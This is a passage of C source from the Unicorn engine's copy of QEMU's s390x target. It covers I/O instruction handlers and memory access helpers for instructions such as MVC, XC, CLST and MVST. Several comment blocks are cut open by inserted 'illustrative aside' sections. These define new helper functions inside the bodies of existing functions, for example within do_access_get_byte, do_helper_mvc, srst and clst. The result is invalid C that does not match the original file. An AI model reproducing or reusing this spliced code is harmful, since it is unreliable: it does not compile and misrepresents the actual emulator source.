PGM_OPERAND, ra); return; } css_do_schm(mbk, update, dct, update ? reg2 : 0); #endif } void ioinst_handle_rsch(S390CPU *cpu, uint64_t reg1, uintptr_t ra) { #if 0 int cssid, ssid, schid, m; SubchDev *sch; if (ioinst_disassemble_sch_ident(reg1, &m, &cssid, &ssid, &schid)) { s390_program_interrupt(&cpu->env, PGM_OPERAND, ra); return; } trace_ioinst_sch_id("rsch", cssid, ssid, schid); sch = css_find_subch(m, cssid, ssid, schid); if (!sch || !css_subch_visible(sch)) { setcc(cpu, 3); return; } setcc(cpu, css_do_rsch(sch)); #endif } #define RCHP_REG1_RES(_reg) (_reg & 0x00000000ff00ff00) #define RCHP_REG1_CSSID(_reg) ((_reg & 0x0000000000ff0000) >> 16) #define RCHP_REG1_CHPID(_reg) (_reg & 0x00000000000000ff) void ioinst_handle_rchp(S390CPU *cpu, uint64_t reg1, uintptr_t ra) { #if 0 int cc; uint8_t cssid; uint8_t chpid; int ret; CPUS390XState *env = &cpu->env; if (RCHP_REG1_RES(reg1)) { s390_program_interrupt(env, PGM_OPERAND, ra); return; } cssid = RCHP_REG1_CSSID(reg1); chpid = RCHP_REG1_CHPID(reg1); ret = css_do_rchp(cssid, chpid); switch (ret) { case -ENODEV: cc = 3; break; case -EBUSY: cc = 2; break; case 0: cc = 0; break; default: /* Invalid channel subsystem. 
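       Any other return value from css_do_rchp() means the cssid did not
       name a valid channel subsystem, which is reported as an operand
       exception instead of a condition code.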
*/
        s390_program_interrupt(env, PGM_OPERAND, ra);
        return;
    }
    setcc(cpu, cc);
#endif
}

#define SAL_REG1_INVALID(_reg) (_reg & 0x0000000080000000)

void ioinst_handle_sal(S390CPU *cpu, uint64_t reg1, uintptr_t ra)
{
    /* We do not provide address limit checking, so let's suppress it. */
    if (SAL_REG1_INVALID(reg1) || reg1 & 0x000000000000ffff) {
        s390_program_interrupt(&cpu->env, PGM_OPERAND, ra);
    }
}
unicorn-2.1.1/qemu/target/s390x/mem_helper.c
/*
 * S/390 memory access helper routines
 *
 * Copyright (c) 2009 Ulrich Hecht
 * Copyright (c) 2009 Alexander Graf
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */
#include "qemu/osdep.h"
#include "cpu.h"
#include "internal.h"
#include "tcg_s390x.h"
#include "exec/helper-proto.h"
#include "exec/exec-all.h"
#include "exec/cpu_ldst.h"
#include "qemu/int128.h"
#include "qemu/atomic128.h"
#include "tcg/tcg.h"
#include "hw/s390x/storage-keys.h"

/*****************************************************************************/
/* Softmmu support */

/* #define DEBUG_HELPER */
#ifdef DEBUG_HELPER
#define HELPER_LOG(x, ...) qemu_log(x)
#else
#define HELPER_LOG(x, ...)
#endif

static inline bool psw_key_valid(CPUS390XState *env, uint8_t psw_key)
{
    uint16_t pkm = env->cregs[3] >> 16;

    if (env->psw.mask & PSW_MASK_PSTATE) {
        /* PSW key has range 0..15, it is valid if the bit is 1 in the PKM */
        return pkm & (0x80 >> psw_key);
    }
    return true;
}

static bool is_destructive_overlap(CPUS390XState *env, uint64_t dest,
                                   uint64_t src, uint32_t len)
{
    if (!len || src == dest) {
        return false;
    }
    /* Take care of wrapping at the end of address space. */
    if (unlikely(wrap_address(env, src + len - 1) < src)) {
        return dest > src || dest <= wrap_address(env, src + len - 1);
    }
    return dest > src && dest <= src + len - 1;
}

/* Trigger a SPECIFICATION exception if an address or a length is not
   naturally aligned. */
static inline void check_alignment(CPUS390XState *env, uint64_t v,
                                   int wordsize, uintptr_t ra)
{
    if (v % wordsize) {
        tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra);
    }
}

/* Load a value from memory according to its size.
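   (A brief illustrative aside, not part of the original file: the
   destructive-overlap rule above can be exercised with plain numbers.
   "overlaps_destructively" below is a hypothetical, wrap-free rendering
   of the same test.) */
static bool overlaps_destructively(uint64_t dest, uint64_t src, uint32_t len)
{
    if (len == 0 || src == dest) {
        return false;
    }
    /* destructive iff dest lands strictly inside the source range */
    return dest > src && dest <= src + len - 1;
}
/* For example, dest == src + 1 with len >= 2 is destructive (a byte is
   overwritten before it has been read), while dest == src - 1 is not.
   Back to the original helper, which loads a value from memory
   according to its size: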
*/
static inline uint64_t cpu_ldusize_data_ra(CPUS390XState *env, uint64_t addr,
                                           int wordsize, uintptr_t ra)
{
    switch (wordsize) {
    case 1:
        return cpu_ldub_data_ra(env, addr, ra);
    case 2:
        return cpu_lduw_data_ra(env, addr, ra);
    default:
        abort();
    }
}

/* Store a value to memory according to its size. */
static inline void cpu_stsize_data_ra(CPUS390XState *env, uint64_t addr,
                                      uint64_t value, int wordsize,
                                      uintptr_t ra)
{
    switch (wordsize) {
    case 1:
        cpu_stb_data_ra(env, addr, value, ra);
        break;
    case 2:
        cpu_stw_data_ra(env, addr, value, ra);
        break;
    default:
        abort();
    }
}

/* An access covers at most 4096 bytes and therefore at most two pages. */
typedef struct S390Access {
    target_ulong vaddr1;
    target_ulong vaddr2;
    char *haddr1;
    char *haddr2;
    uint16_t size1;
    uint16_t size2;
    /*
     * If we can't access the host page directly, we'll have to do I/O access
     * via ld/st helpers. These are internal details, so we store the
     * mmu idx to do the access here instead of passing it around in the
     * helpers. Maybe, one day we can get rid of ld/st access - once we can
     * handle TLB_NOTDIRTY differently. We don't expect these special accesses
     * to trigger exceptions - only if we would have TLB_NOTDIRTY on LAP
     * pages, we might trigger a new MMU translation - very unlikely that
     * the mapping changes in between and we would trigger a fault.
     */
    int mmu_idx;
} S390Access;

static S390Access access_prepare(CPUS390XState *env, vaddr vaddr, int size,
                                 MMUAccessType access_type, int mmu_idx,
                                 uintptr_t ra)
{
    S390Access access = {
        .vaddr1 = vaddr,
        .size1 = MIN(size, -(vaddr | TARGET_PAGE_MASK)),
        .mmu_idx = mmu_idx,
    };

    g_assert(size > 0 && size <= 4096);
    access.haddr1 = probe_access(env, access.vaddr1, access.size1, access_type,
                                 mmu_idx, ra);

    if (unlikely(access.size1 != size)) {
        /* The access crosses page boundaries. */
        access.vaddr2 = wrap_address(env, vaddr + access.size1);
        access.size2 = size - access.size1;
        access.haddr2 = probe_access(env, access.vaddr2, access.size2,
                                     access_type, mmu_idx, ra);
    }
    return access;
}

/* Helper to handle memset on a single page. */
static void do_access_memset(CPUS390XState *env, vaddr vaddr, char *haddr,
                             uint8_t byte, uint16_t size, int mmu_idx,
                             uintptr_t ra)
{
    TCGMemOpIdx oi = make_memop_idx(MO_UB, mmu_idx);
    int i;

    if (likely(haddr)) {
        memset(haddr, byte, size);
    } else {
        /*
         * Do a single access and test if we can then get access to the
         * page. This is especially relevant to speed up TLB_NOTDIRTY.
         */
        g_assert(size > 0);
        helper_ret_stb_mmu(env, vaddr, byte, oi, ra);
        haddr = tlb_vaddr_to_host(env, vaddr, MMU_DATA_STORE, mmu_idx);
        if (likely(haddr)) {
            memset(haddr + 1, byte, size - 1);
        } else {
            for (i = 1; i < size; i++) {
                helper_ret_stb_mmu(env, vaddr + i, byte, oi, ra);
            }
        }
    }
}

static void access_memset(CPUS390XState *env, S390Access *desta,
                          uint8_t byte, uintptr_t ra)
{
    do_access_memset(env, desta->vaddr1, desta->haddr1, byte, desta->size1,
                     desta->mmu_idx, ra);
    if (likely(!desta->size2)) {
        return;
    }
    do_access_memset(env, desta->vaddr2, desta->haddr2, byte, desta->size2,
                     desta->mmu_idx, ra);
}

static uint8_t do_access_get_byte(CPUS390XState *env, vaddr vaddr,
                                  char **haddr, int offset, int mmu_idx,
                                  uintptr_t ra)
{
    TCGMemOpIdx oi = make_memop_idx(MO_UB, mmu_idx);
    uint8_t byte;

    if (likely(*haddr)) {
        return ldub_p(*haddr + offset);
    }
    /*
     * Do a single access and test if we can then get access to the
     * page. This is especially relevant to speed up TLB_NOTDIRTY.
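     * (Illustrative aside, not part of the original file: the size1/size2
     * page split performed by access_prepare above can be shown with plain
     * arithmetic. "split_at_page" and the 4 KiB mask are hypothetical
     * stand-ins for the real TARGET_PAGE_* definitions.) */
static void split_at_page(uint64_t vaddr, int size,
                          uint16_t *size1, uint16_t *size2)
{
    /* -(vaddr | ~0xfffULL) is the number of bytes from vaddr up to the
       end of its 4 KiB page */
    uint64_t left = -(vaddr | ~0xfffULL);

    *size1 = (uint16_t)((uint64_t)size < left ? (uint64_t)size : left);
    *size2 = (uint16_t)(size - *size1);
}
/* E.g. vaddr = 0x1ffe with size = 8 yields size1 = 2 and size2 = 6:
   the access crosses into a second page. (End of aside.)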
*/ byte = helper_ret_ldub_mmu(env, vaddr + offset, oi, ra); *haddr = tlb_vaddr_to_host(env, vaddr, MMU_DATA_LOAD, mmu_idx); return byte; } static uint8_t access_get_byte(CPUS390XState *env, S390Access *access, int offset, uintptr_t ra) { if (offset < access->size1) { return do_access_get_byte(env, access->vaddr1, &access->haddr1, offset, access->mmu_idx, ra); } return do_access_get_byte(env, access->vaddr2, &access->haddr2, offset - access->size1, access->mmu_idx, ra); } static void do_access_set_byte(CPUS390XState *env, vaddr vaddr, char **haddr, int offset, uint8_t byte, int mmu_idx, uintptr_t ra) { TCGMemOpIdx oi = make_memop_idx(MO_UB, mmu_idx); if (likely(*haddr)) { stb_p(*haddr + offset, byte); return; } /* * Do a single access and test if we can then get access to the * page. This is especially relevant to speed up TLB_NOTDIRTY. */ helper_ret_stb_mmu(env, vaddr + offset, byte, oi, ra); *haddr = tlb_vaddr_to_host(env, vaddr, MMU_DATA_STORE, mmu_idx); } static void access_set_byte(CPUS390XState *env, S390Access *access, int offset, uint8_t byte, uintptr_t ra) { if (offset < access->size1) { do_access_set_byte(env, access->vaddr1, &access->haddr1, offset, byte, access->mmu_idx, ra); } else { do_access_set_byte(env, access->vaddr2, &access->haddr2, offset - access->size1, byte, access->mmu_idx, ra); } } /* * Move data with the same semantics as memmove() in case ranges don't overlap * or src > dest. Undefined behavior on destructive overlaps. */ static void access_memmove(CPUS390XState *env, S390Access *desta, S390Access *srca, uintptr_t ra) { int diff; g_assert(desta->size1 + desta->size2 == srca->size1 + srca->size2); /* Fallback to slow access in case we don't have access to all host pages */ if (unlikely(!desta->haddr1 || (desta->size2 && !desta->haddr2) || !srca->haddr1 || (srca->size2 && !srca->haddr2))) { int i; for (i = 0; i < desta->size1 + desta->size2; i++) { uint8_t byte = access_get_byte(env, srca, i, ra); access_set_byte(env, desta, i, byte, ra); } return; } if (srca->size1 == desta->size1) { memmove(desta->haddr1, srca->haddr1, srca->size1); if (unlikely(srca->size2)) { memmove(desta->haddr2, srca->haddr2, srca->size2); } } else if (srca->size1 < desta->size1) { diff = desta->size1 - srca->size1; memmove(desta->haddr1, srca->haddr1, srca->size1); memmove(desta->haddr1 + srca->size1, srca->haddr2, diff); if (likely(desta->size2)) { memmove(desta->haddr2, srca->haddr2 + diff, desta->size2); } } else { diff = srca->size1 - desta->size1; memmove(desta->haddr1, srca->haddr1, desta->size1); memmove(desta->haddr2, srca->haddr1 + desta->size1, diff); if (likely(srca->size2)) { memmove(desta->haddr2 + diff, srca->haddr2, srca->size2); } } } static int mmu_idx_from_as(uint8_t as) { switch (as) { case AS_PRIMARY: return MMU_PRIMARY_IDX; case AS_SECONDARY: return MMU_SECONDARY_IDX; case AS_HOME: return MMU_HOME_IDX; default: /* FIXME AS_ACCREG */ g_assert_not_reached(); } } /* and on array */ static uint32_t do_helper_nc(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src, uintptr_t ra) { const int mmu_idx = cpu_mmu_index(env, false); S390Access srca1, srca2, desta; uint32_t i; uint8_t c = 0; HELPER_LOG("%s l %d dest %" PRIx64 " src %" PRIx64 "\n", __func__, l, dest, src); /* NC always processes one more byte than specified - maximum is 256 */ l++; srca1 = access_prepare(env, src, l, MMU_DATA_LOAD, mmu_idx, ra); srca2 = access_prepare(env, dest, l, MMU_DATA_LOAD, mmu_idx, ra); desta = access_prepare(env, dest, l, MMU_DATA_STORE, mmu_idx, ra); for (i = 0; i < l; i++) { const 
uint8_t x = access_get_byte(env, &srca1, i, ra) & access_get_byte(env, &srca2, i, ra); c |= x; access_set_byte(env, &desta, i, x, ra); } return c != 0; } uint32_t HELPER(nc)(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src) { return do_helper_nc(env, l, dest, src, GETPC()); } /* xor on array */ static uint32_t do_helper_xc(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src, uintptr_t ra) { const int mmu_idx = cpu_mmu_index(env, false); S390Access srca1, srca2, desta; uint32_t i; uint8_t c = 0; HELPER_LOG("%s l %d dest %" PRIx64 " src %" PRIx64 "\n", __func__, l, dest, src); /* XC always processes one more byte than specified - maximum is 256 */ l++; srca1 = access_prepare(env, src, l, MMU_DATA_LOAD, mmu_idx, ra); srca2 = access_prepare(env, dest, l, MMU_DATA_LOAD, mmu_idx, ra); desta = access_prepare(env, dest, l, MMU_DATA_STORE, mmu_idx, ra); /* xor with itself is the same as memset(0) */ if (src == dest) { access_memset(env, &desta, 0, ra); return 0; } for (i = 0; i < l; i++) { const uint8_t x = access_get_byte(env, &srca1, i, ra) ^ access_get_byte(env, &srca2, i, ra); c |= x; access_set_byte(env, &desta, i, x, ra); } return c != 0; } uint32_t HELPER(xc)(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src) { return do_helper_xc(env, l, dest, src, GETPC()); } /* or on array */ static uint32_t do_helper_oc(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src, uintptr_t ra) { const int mmu_idx = cpu_mmu_index(env, false); S390Access srca1, srca2, desta; uint32_t i; uint8_t c = 0; HELPER_LOG("%s l %d dest %" PRIx64 " src %" PRIx64 "\n", __func__, l, dest, src); /* OC always processes one more byte than specified - maximum is 256 */ l++; srca1 = access_prepare(env, src, l, MMU_DATA_LOAD, mmu_idx, ra); srca2 = access_prepare(env, dest, l, MMU_DATA_LOAD, mmu_idx, ra); desta = access_prepare(env, dest, l, MMU_DATA_STORE, mmu_idx, ra); for (i = 0; i < l; i++) { const uint8_t x = access_get_byte(env, &srca1, i, ra) | access_get_byte(env, &srca2, i, ra); c |= x; access_set_byte(env, &desta, i, x, ra); } return c != 0; } uint32_t HELPER(oc)(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src) { return do_helper_oc(env, l, dest, src, GETPC()); } /* memmove */ static uint32_t do_helper_mvc(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src, uintptr_t ra) { const int mmu_idx = cpu_mmu_index(env, false); S390Access srca, desta; uint32_t i; HELPER_LOG("%s l %d dest %" PRIx64 " src %" PRIx64 "\n", __func__, l, dest, src); /* MVC always copies one more byte than specified - maximum is 256 */ l++; srca = access_prepare(env, src, l, MMU_DATA_LOAD, mmu_idx, ra); desta = access_prepare(env, dest, l, MMU_DATA_STORE, mmu_idx, ra); /* * "When the operands overlap, the result is obtained as if the operands * were processed one byte at a time". Only non-destructive overlaps * behave like memmove(). 
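 * (Illustrative aside, not part of the original file: the byte-at-a-time
 * semantics quoted above can be sketched over plain host memory;
 * "mvc_bytewise" and "mem" are hypothetical names.) */
static void mvc_bytewise(uint8_t *mem, size_t dest, size_t src, size_t len)
{
    size_t i;

    /* copy strictly left to right, one byte at a time */
    for (i = 0; i < len; i++) {
        mem[dest + i] = mem[src + i];
    }
}
/* With dest == src + 1 this propagates mem[src] across the whole
   destination, which is why the code below turns that case into a
   memset of the first source byte. (End of aside.)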
*/ if (dest == src + 1) { access_memset(env, &desta, access_get_byte(env, &srca, 0, ra), ra); } else if (!is_destructive_overlap(env, dest, src, l)) { access_memmove(env, &desta, &srca, ra); } else { for (i = 0; i < l; i++) { uint8_t byte = access_get_byte(env, &srca, i, ra); access_set_byte(env, &desta, i, byte, ra); } } return env->cc_op; } void HELPER(mvc)(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src) { do_helper_mvc(env, l, dest, src, GETPC()); } /* move inverse */ void HELPER(mvcin)(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src) { const int mmu_idx = cpu_mmu_index(env, false); S390Access srca, desta; uintptr_t ra = GETPC(); int i; /* MVCIN always copies one more byte than specified - maximum is 256 */ l++; src = wrap_address(env, src - l + 1); srca = access_prepare(env, src, l, MMU_DATA_LOAD, mmu_idx, ra); desta = access_prepare(env, dest, l, MMU_DATA_STORE, mmu_idx, ra); for (i = 0; i < l; i++) { const uint8_t x = access_get_byte(env, &srca, l - i - 1, ra); access_set_byte(env, &desta, i, x, ra); } } /* move numerics */ void HELPER(mvn)(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src) { const int mmu_idx = cpu_mmu_index(env, false); S390Access srca1, srca2, desta; uintptr_t ra = GETPC(); int i; /* MVN always copies one more byte than specified - maximum is 256 */ l++; srca1 = access_prepare(env, src, l, MMU_DATA_LOAD, mmu_idx, ra); srca2 = access_prepare(env, dest, l, MMU_DATA_LOAD, mmu_idx, ra); desta = access_prepare(env, dest, l, MMU_DATA_STORE, mmu_idx, ra); for (i = 0; i < l; i++) { const uint8_t x = (access_get_byte(env, &srca1, i, ra) & 0x0f) | (access_get_byte(env, &srca2, i, ra) & 0xf0); access_set_byte(env, &desta, i, x, ra); } } /* move with offset */ void HELPER(mvo)(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src) { const int mmu_idx = cpu_mmu_index(env, false); /* MVO always processes one more byte than specified - maximum is 16 */ const int len_dest = (l >> 4) + 1; const int len_src = (l & 0xf) + 1; uintptr_t ra = GETPC(); uint8_t byte_dest, byte_src; S390Access srca, desta; int i, j; srca = access_prepare(env, src, len_src, MMU_DATA_LOAD, mmu_idx, ra); desta = access_prepare(env, dest, len_dest, MMU_DATA_STORE, mmu_idx, ra); /* Handle rightmost byte */ byte_dest = cpu_ldub_data_ra(env, dest + len_dest - 1, ra); byte_src = access_get_byte(env, &srca, len_src - 1, ra); byte_dest = (byte_dest & 0x0f) | (byte_src << 4); access_set_byte(env, &desta, len_dest - 1, byte_dest, ra); /* Process remaining bytes from right to left */ for (i = len_dest - 2, j = len_src - 2; i >= 0; i--, j--) { byte_dest = byte_src >> 4; if (j >= 0) { byte_src = access_get_byte(env, &srca, j, ra); } else { byte_src = 0; } byte_dest |= byte_src << 4; access_set_byte(env, &desta, i, byte_dest, ra); } } /* move zones */ void HELPER(mvz)(CPUS390XState *env, uint32_t l, uint64_t dest, uint64_t src) { const int mmu_idx = cpu_mmu_index(env, false); S390Access srca1, srca2, desta; uintptr_t ra = GETPC(); int i; /* MVZ always copies one more byte than specified - maximum is 256 */ l++; srca1 = access_prepare(env, src, l, MMU_DATA_LOAD, mmu_idx, ra); srca2 = access_prepare(env, dest, l, MMU_DATA_LOAD, mmu_idx, ra); desta = access_prepare(env, dest, l, MMU_DATA_STORE, mmu_idx, ra); for (i = 0; i < l; i++) { const uint8_t x = (access_get_byte(env, &srca1, i, ra) & 0xf0) | (access_get_byte(env, &srca2, i, ra) & 0x0f); access_set_byte(env, &desta, i, x, ra); } } /* compare unsigned byte arrays */ static uint32_t do_helper_clc(CPUS390XState *env, uint32_t l, 
uint64_t s1, uint64_t s2, uintptr_t ra) { uint32_t i; uint32_t cc = 0; HELPER_LOG("%s l %d s1 %" PRIx64 " s2 %" PRIx64 "\n", __func__, l, s1, s2); for (i = 0; i <= l; i++) { uint8_t x = cpu_ldub_data_ra(env, s1 + i, ra); uint8_t y = cpu_ldub_data_ra(env, s2 + i, ra); HELPER_LOG("%02x (%c)/%02x (%c) ", x, x, y, y); if (x < y) { cc = 1; break; } else if (x > y) { cc = 2; break; } } HELPER_LOG("\n"); return cc; } uint32_t HELPER(clc)(CPUS390XState *env, uint32_t l, uint64_t s1, uint64_t s2) { return do_helper_clc(env, l, s1, s2, GETPC()); } /* compare logical under mask */ uint32_t HELPER(clm)(CPUS390XState *env, uint32_t r1, uint32_t mask, uint64_t addr) { uintptr_t ra = GETPC(); uint32_t cc = 0; HELPER_LOG("%s: r1 0x%x mask 0x%x addr 0x%" PRIx64 "\n", __func__, r1, mask, addr); while (mask) { if (mask & 8) { uint8_t d = cpu_ldub_data_ra(env, addr, ra); uint8_t r = extract32(r1, 24, 8); HELPER_LOG("mask 0x%x %02x/%02x (0x%" PRIx64 ") ", mask, r, d, addr); if (r < d) { cc = 1; break; } else if (r > d) { cc = 2; break; } addr++; } mask = (mask << 1) & 0xf; r1 <<= 8; } HELPER_LOG("\n"); return cc; } static inline uint64_t get_address(CPUS390XState *env, int reg) { return wrap_address(env, env->regs[reg]); } /* * Store the address to the given register, zeroing out unused leftmost * bits in bit positions 32-63 (24-bit and 31-bit mode only). */ static inline void set_address_zero(CPUS390XState *env, int reg, uint64_t address) { if (env->psw.mask & PSW_MASK_64) { env->regs[reg] = address; } else { if (!(env->psw.mask & PSW_MASK_32)) { address &= 0x00ffffff; } else { address &= 0x7fffffff; } env->regs[reg] = deposit64(env->regs[reg], 0, 32, address); } } static inline void set_address(CPUS390XState *env, int reg, uint64_t address) { if (env->psw.mask & PSW_MASK_64) { /* 64-Bit mode */ env->regs[reg] = address; } else { if (!(env->psw.mask & PSW_MASK_32)) { /* 24-Bit mode. According to the PoO it is implementation dependent if bits 32-39 remain unchanged or are set to zeros. Choose the former so that the function can also be used for TRT. */ env->regs[reg] = deposit64(env->regs[reg], 0, 24, address); } else { /* 31-Bit mode. According to the PoO it is implementation dependent if bit 32 remains unchanged or is set to zero. Choose the latter so that the function can also be used for TRT. */ address &= 0x7fffffff; env->regs[reg] = deposit64(env->regs[reg], 0, 32, address); } } } static inline uint64_t wrap_length32(CPUS390XState *env, uint64_t length) { if (!(env->psw.mask & PSW_MASK_64)) { return (uint32_t)length; } return length; } static inline uint64_t wrap_length31(CPUS390XState *env, uint64_t length) { if (!(env->psw.mask & PSW_MASK_64)) { /* 24-Bit and 31-Bit mode */ length &= 0x7fffffff; } return length; } static inline uint64_t get_length(CPUS390XState *env, int reg) { return wrap_length31(env, env->regs[reg]); } static inline void set_length(CPUS390XState *env, int reg, uint64_t length) { if (env->psw.mask & PSW_MASK_64) { /* 64-Bit mode */ env->regs[reg] = length; } else { /* 24-Bit and 31-Bit mode */ env->regs[reg] = deposit64(env->regs[reg], 0, 32, length); } } /* search string (c is byte to search, r2 is string, r1 end of string) */ void HELPER(srst)(CPUS390XState *env, uint32_t r1, uint32_t r2) { uintptr_t ra = GETPC(); uint64_t end, str; uint32_t len; uint8_t v, c = env->regs[0]; /* Bits 32-55 must contain all 0. 
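   (Illustrative aside, not part of the original file: s390 numbers bits
   from the left, so bit 0 is the most-significant bit of a 64-bit
   register. The hypothetical helper below maps that convention onto an
   ordinary mask.) */
static uint64_t s390_bit(unsigned pos)
{
    return 1ULL << (63 - pos); /* bit 0 is the MSB */
}
/* Bits 32-55 of r0 therefore correspond to
   s390_bit(32) | ... | s390_bit(55) == 0x00000000ffffff00ull, which is
   exactly the mask tested below. (End of aside.)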
*/ if (env->regs[0] & 0xffffff00u) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } str = get_address(env, r2); end = get_address(env, r1); /* Lest we fail to service interrupts in a timely manner, limit the amount of work we're willing to do. For now, let's cap at 8k. */ for (len = 0; len < 0x2000; ++len) { if (str + len == end) { /* Character not found. R1 & R2 are unmodified. */ env->cc_op = 2; return; } v = cpu_ldub_data_ra(env, str + len, ra); if (v == c) { /* Character found. Set R1 to the location; R2 is unmodified. */ env->cc_op = 1; set_address(env, r1, str + len); return; } } /* CPU-determined bytes processed. Advance R2 to next byte to process. */ env->cc_op = 3; set_address(env, r2, str + len); } void HELPER(srstu)(CPUS390XState *env, uint32_t r1, uint32_t r2) { uintptr_t ra = GETPC(); uint32_t len; uint16_t v, c = env->regs[0]; uint64_t end, str, adj_end; /* Bits 32-47 of R0 must be zero. */ if (env->regs[0] & 0xffff0000u) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } str = get_address(env, r2); end = get_address(env, r1); /* If the LSB of the two addresses differ, use one extra byte. */ adj_end = end + ((str ^ end) & 1); /* Lest we fail to service interrupts in a timely manner, limit the amount of work we're willing to do. For now, let's cap at 8k. */ for (len = 0; len < 0x2000; len += 2) { if (str + len == adj_end) { /* End of input found. */ env->cc_op = 2; return; } v = cpu_lduw_data_ra(env, str + len, ra); if (v == c) { /* Character found. Set R1 to the location; R2 is unmodified. */ env->cc_op = 1; set_address(env, r1, str + len); return; } } /* CPU-determined bytes processed. Advance R2 to next byte to process. */ env->cc_op = 3; set_address(env, r2, str + len); } /* unsigned string compare (c is string terminator) */ uint64_t HELPER(clst)(CPUS390XState *env, uint64_t c, uint64_t s1, uint64_t s2) { uintptr_t ra = GETPC(); uint32_t len; c = c & 0xff; s1 = wrap_address(env, s1); s2 = wrap_address(env, s2); /* Lest we fail to service interrupts in a timely manner, limit the amount of work we're willing to do. For now, let's cap at 8k. */ for (len = 0; len < 0x2000; ++len) { uint8_t v1 = cpu_ldub_data_ra(env, s1 + len, ra); uint8_t v2 = cpu_ldub_data_ra(env, s2 + len, ra); if (v1 == v2) { if (v1 == c) { /* Equal. CC=0, and don't advance the registers. */ env->cc_op = 0; env->retxl = s2; return s1; } } else { /* Unequal. CC={1,2}, and advance the registers. Note that the terminator need not be zero, but the string that contains the terminator is by definition "low". */ env->cc_op = (v1 == c ? 1 : v2 == c ? 2 : v1 < v2 ? 1 : 2); env->retxl = s2 + len; return s1 + len; } } /* CPU-determined bytes equal; advance the registers. 
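   (Illustrative aside, not part of the original file: the condition code
   chosen above for the first unequal byte pair can be written out
   long-hand; "clst_cc" is a hypothetical name.) */
static int clst_cc(uint8_t v1, uint8_t v2, uint8_t term)
{
    /* the operand containing the terminator compares "low" by definition */
    if (v1 == term) {
        return 1; /* first operand low */
    }
    if (v2 == term) {
        return 2; /* second operand low */
    }
    return v1 < v2 ? 1 : 2; /* otherwise a plain unsigned comparison */
}
/* (End of aside; the cap-reached path with all bytes equal continues
   below with cc 3.)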
*/
    env->cc_op = 3;
    env->retxl = s2 + len;
    return s1 + len;
}

/* move page */
uint32_t HELPER(mvpg)(CPUS390XState *env, uint64_t r0, uint64_t r1, uint64_t r2)
{
    const int mmu_idx = cpu_mmu_index(env, false);
    const bool f = extract64(r0, 11, 1);
    const bool s = extract64(r0, 10, 1);
    uintptr_t ra = GETPC();
    S390Access srca, desta;

    if ((f && s) || extract64(r0, 12, 4)) {
        tcg_s390_program_interrupt(env, PGM_SPECIFICATION, GETPC());
    }

    r1 = wrap_address(env, r1 & TARGET_PAGE_MASK);
    r2 = wrap_address(env, r2 & TARGET_PAGE_MASK);

    /*
     * TODO:
     * - Access key handling
     * - CC-option with suppression of page-translation exceptions
     * - Store r1/r2 register identifiers at real location 162
     */
    srca = access_prepare(env, r2, TARGET_PAGE_SIZE, MMU_DATA_LOAD, mmu_idx,
                          ra);
    desta = access_prepare(env, r1, TARGET_PAGE_SIZE, MMU_DATA_STORE, mmu_idx,
                           ra);
    access_memmove(env, &desta, &srca, ra);
    return 0; /* data moved */
}

/* string copy */
uint32_t HELPER(mvst)(CPUS390XState *env, uint32_t r1, uint32_t r2)
{
    const int mmu_idx = cpu_mmu_index(env, false);
    const uint64_t d = get_address(env, r1);
    const uint64_t s = get_address(env, r2);
    const uint8_t c = env->regs[0];
    const int len = MIN(-(d | TARGET_PAGE_MASK), -(s | TARGET_PAGE_MASK));
    S390Access srca, desta;
    uintptr_t ra = GETPC();
    int i;

    if (env->regs[0] & 0xffffff00ull) {
        tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra);
    }

    /*
     * Our access should not exceed single pages, as we must not report access
     * exceptions exceeding the actually copied range (which we don't know at
     * this point). We might over-indicate watchpoints within the pages
     * (if we ever care, we have to limit processing to a single byte).
     */
    srca = access_prepare(env, s, len, MMU_DATA_LOAD, mmu_idx, ra);
    desta = access_prepare(env, d, len, MMU_DATA_STORE, mmu_idx, ra);
    for (i = 0; i < len; i++) {
        const uint8_t v = access_get_byte(env, &srca, i, ra);

        access_set_byte(env, &desta, i, v, ra);
        if (v == c) {
            set_address_zero(env, r1, d + i);
            return 1;
        }
    }
    set_address_zero(env, r1, d + len);
    set_address_zero(env, r2, s + len);
    return 3;
}

/* load access registers r1 to r3 from memory at a2 */
void HELPER(lam)(CPUS390XState *env, uint32_t r1, uint64_t a2, uint32_t r3)
{
    uintptr_t ra = GETPC();
    int i;

    if (a2 & 0x3) {
        tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra);
    }

    for (i = r1;; i = (i + 1) % 16) {
        env->aregs[i] = cpu_ldl_data_ra(env, a2, ra);
        a2 += 4;

        if (i == r3) {
            break;
        }
    }
}

/* store access registers r1 to r3 in memory at a2 */
void HELPER(stam)(CPUS390XState *env, uint32_t r1, uint64_t a2, uint32_t r3)
{
    uintptr_t ra = GETPC();
    int i;

    if (a2 & 0x3) {
        tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra);
    }

    for (i = r1;; i = (i + 1) % 16) {
        cpu_stl_data_ra(env, a2, env->aregs[i], ra);
        a2 += 4;

        if (i == r3) {
            break;
        }
    }
}

/* move long helper */
static inline uint32_t do_mvcl(CPUS390XState *env,
                               uint64_t *dest, uint64_t *destlen,
                               uint64_t *src, uint64_t *srclen,
                               uint16_t pad, int wordsize, uintptr_t ra)
{
    const int mmu_idx = cpu_mmu_index(env, false);
    int len = MIN(*destlen, -(*dest | TARGET_PAGE_MASK));
    S390Access srca, desta;
    int i, cc;

    if (*destlen == *srclen) {
